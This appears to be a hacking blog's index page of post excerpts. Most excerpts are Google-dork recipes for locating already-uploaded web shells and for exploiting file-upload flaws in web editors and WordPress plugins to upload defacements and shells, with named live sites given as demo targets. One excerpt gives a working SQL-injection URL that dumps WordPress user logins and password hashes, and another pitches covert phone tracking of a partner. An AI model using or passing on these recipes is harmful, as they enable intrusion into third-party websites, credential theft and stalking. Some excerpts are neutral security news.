Find Uploaded shells and Passwords By Google dorks (priv8 dorks)

Go to Google.com and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !! Dorks for finding shells: inurl:.php "cURL: ON MySQL: ON MSSQL: OFF" "Shell" filetype:php intext:"uname -a:" "EDT 2010" intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ] inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:"c100.php"...

Read more...

Wireless Hacking Tools 2011 : Free Download

WiPhire is a Bash script aimed at making the Wireless Hacking process a lot easier. This script was written on Backtrack 4 and designed to be used with Backtrack 4. This script was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite you will need to put it into monitor mode prior to running the script...

Read more...

"Add Testimonial" : Remote File Upload Vulnerability.

[#1] Open website .. [#2] Go to this URL: testimonial/add.html.php  For example:  http://Site.com/testimonial/add.html.php [#3] Now Upload Your Deface or any file [#4] To view you upload file go to /images/testimonial/ , you'll see index of files here ... click on last file, its yours !! [#5] Enjoy=) and do leave a Comment below if you Like it Demo : http://sdhealingarts.com/testimonial/add.html.php? http://slangmediagroup.com/testimonial/add.html.php?http://thepharmcollective.com/testimonial/add.html.php?...

Read more...

HTML Editor File Upload Vulnerability

Google Dork:inurl:/HTMLEditor/editor/  or  "inurl:/HTMLEditor/editor//filemanager/" or "inurl:/HTMLEditor/editor//filemanager//connectors/" Exploit:  http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html or   http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html Go here, http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html...

Read more...

WPScan v.1.1 is released, a WordPress Security vulnerability scanner

“WPScan is a WordPress Security vulnerability scanner which checks the security of WordPress installations using a black box approach, written in Ruby. DETAILSUsername enumeration (from author querystring and location header) Weak password cracking (multithreaded) Version enumeration (from generator meta tag and from client side files) Vulnerability enumeration (based on version) Plugin enumeration (2220 most popular by default) Plugin vulnerability...

Read more...

OpenDNS released preview of DNSCrypt Tool (Secures DNS Traffic)

OpenDNS released a preview of DNSCrypt Tool , a piece of lightweight software that everyone should use to boost online privacy and security.  It works by encrypting all DNS traffic between the user and OpenDNS, preventing any spying, spoofing or man-in-the-middle attacks. For now, DNSCyrpt supports only Mac platform. DNSCrypt works like SSL in that it wraps all DNS traffic with encryption the same way SSL wraps all HTTP traffic,...

Read more...

KindEdior Remote File Upload Exploit

Google Dork:   intitle:index of? inurl:kindeditor inurl:examples/uploadbutton.html    Exploit: http://www.vulnrabewebsite.com/path/kindeditor/examples/uploadbutton.html Choose any website from google search results and go-to vulnerable URL like http://www.vulnrabewebsite.com/kindeditor/examples/uploadbutton.html now click on upload and select your file, it will be automaticly uploaded,and you'll get your uploaded file Link/URL...

Read more...

43 Excellent WordPress Security Tips & Plugins

After putting in all of the time, and perhaps money, into your WordPress website or blog, its now time to secure and protect it from outside enemies and general bad guys: hackers, spammers and all round tossers. Without a doubt, for a self-hosted blog, WordPress is the best blog CMS that you can get. Though it comes packed with security features, being a popular and open source software, it also means that hackers have full access to the code...

Read more...

Chat with Friends through MS-DOS Command Prompt

All you need is your friend's I.P. Address and your Command Prompt. Then Open Notepad and write this code as it is.....! @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Now save this as "Messenger.Bat". Open Command Prompt. Drag this file (.bat file) over to Command Prompt and press Enter. You would then see something like this: Now, type the I.P. Address of the computer you want to contact and press...

Read more...

WordPress Plugin : tdo Mini File Upload Vulnerability

WordPress Plugin : tdo Mini  File Upload Vunerablity Google Dork :  "inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1"Go to google.com and enter this dork   "inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1" Now see the results and select any site....... Now upload your deface as deface.html;.jpg and upload your shell as shell.asp;.jpg or shell.php;.jpg and see your uploaded file here.... www.site.com/wp/wp-content/uploads/tdomf/tmp/1/Yourfilehere...

Read more...

New Wordpress Exploit : 10K+ Websites vulnerable through this attack

WordPress Easy Comment Upload Vulnerability: Google Dork:"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"   /wp-content/plugins/easy-comment-uploads/upload-form.php  Index of /wp-content/plugins/easy-comment-uploads Open Google and enter any dork given above.. Now selct any website  and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php You'll Get Upload Option here :) Now Upload Your...

Read more...

Wordpress FCKEDITOR upload Vunerablity : Upload Your Deface Remotely

This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here  open Google.com and enter Dork:  inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html orinurl:Powered By OpenCart You'll Got a lot of websites by google, select anyone ... For Example i got this one http://www.schoolshopper.com.au/ Then...

Read more...

Simplest way to hack any Wordpress based site

In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE. First we'll use this dork to search website with the help of Google inurl:"wp-content/plugins/photoracer/viewimg.php?id=" Results:  I'm now gonna test one of them.. For eg.. http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2  Now add the Exploit.. /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--...

Read more...

Ping.fm vulnerable to Clickjacking

Two Indian Hackers Aditya Gupta(@adi1391) and Subho Halder (@sunnyrockzzs) have discovered Clickjacking vulnerability in one of the famous website "Ping.FM". Clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. This is based on a technique known as clickjacking ( or UI Redressing ) where...

Read more...

Trace Anyones Mobile with G.P.S. and without G.P.S.

Do you doubt on your Boyfriend/Girlfriend ? Do you wanna track them via mobile location? This is now possible...I'm not joking. Many of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done.  Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in G.P.S. cell phone and you are ready...

Read more...